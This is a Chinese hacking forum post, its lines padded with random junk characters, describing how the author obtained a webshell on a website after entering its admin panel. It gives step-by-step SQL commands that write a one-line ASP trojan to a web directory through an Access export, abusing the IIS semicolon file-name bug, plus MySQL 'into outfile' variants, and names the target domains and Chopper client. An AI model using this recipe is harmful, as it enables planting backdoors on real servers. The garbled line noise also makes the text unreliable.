好不容易进了后台,发现啥上传啊。备份啊多木有。
! [- b1 T5 v) i+ ^. s6 q9 vwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
, | V, Z/ V# X g9 i0 S% O& v文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
" I; @2 G% a# I! Y- d* i然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
: H! A* _- j) d3 J: y5 f1.create table cmd (a varchar(50))1 Q& L7 b, q% D" ~) q0 \2 ~
2.insert into cmd (a) values (‘‘)+ I5 c- @9 p8 T8 D0 A
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
' o7 Q" X4 s2 ]; u2 @8 L(把表cmd的内容导出为物理路径的一个EXCEL文件). e: y3 p/ _8 y6 I E1 ?
4.drop table cmd/ |2 E: K/ ~$ p9 Z" Z3 c
利用IIS的BUG成功拿到了WEBSHELL。) y, S! T' E8 w2 f+ J
7 g d; ]3 H. B( I5 U" t直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话' {" l9 o. {( M3 B0 k( k
# G5 Z+ ]3 H) x, G3 `
SQL语句意思解释:
7 C' g6 Y7 t( G5 [ 第一句
1 p4 {/ Z1 W0 D9 n2 E! B: m5 z 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
- P) u9 {! D: j: z$ G9 K4 u1 V7 T3 s$ Y3 V+ f5 X
第二句
. |, l8 {3 z6 \; u' F 在表cmd的a字段插入一句话木马- ^" @ F, V& q" E: ~
第三句
' u- R& U: C# u' j* ] 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件4 Q1 N3 V" u. O& n- M) ]6 q
0 f4 X# k; ^; O' Y0 ~, n; k5 V
第四句
. r" O1 j9 g* z/ \) C, s5 X. F 删除建立的cmd表
: P; l. \: L) Z$ O" F) ~. T8 U- J0 t/ V" a' g0 i4 R5 L
以下内容为测试:4 O- U# P; M+ ]; i. q
Access利用后台SQL执行命令功能导出WebShell:
9 R. M0 N2 b$ d: ^4 C$ ]& a, b/ ? 这个更简单:
J( v0 [+ B. A' }( a, E/ w. p7 B. E [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]( B$ d% [) i% ~* g7 t5 Y c
或者
9 a, r! B5 G* u6 m* D- J [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]- w" N. k. \1 @
T8 _! Z5 q/ S. U 后台有执行SQL语句功能(vote为已知表段)
2 d* Z4 A, x( o; f; y! {5 @* k 希望对大家有所帮助拿shell的又一个思路
5 p' f' L$ p4 W; O G, H' h+ G; g |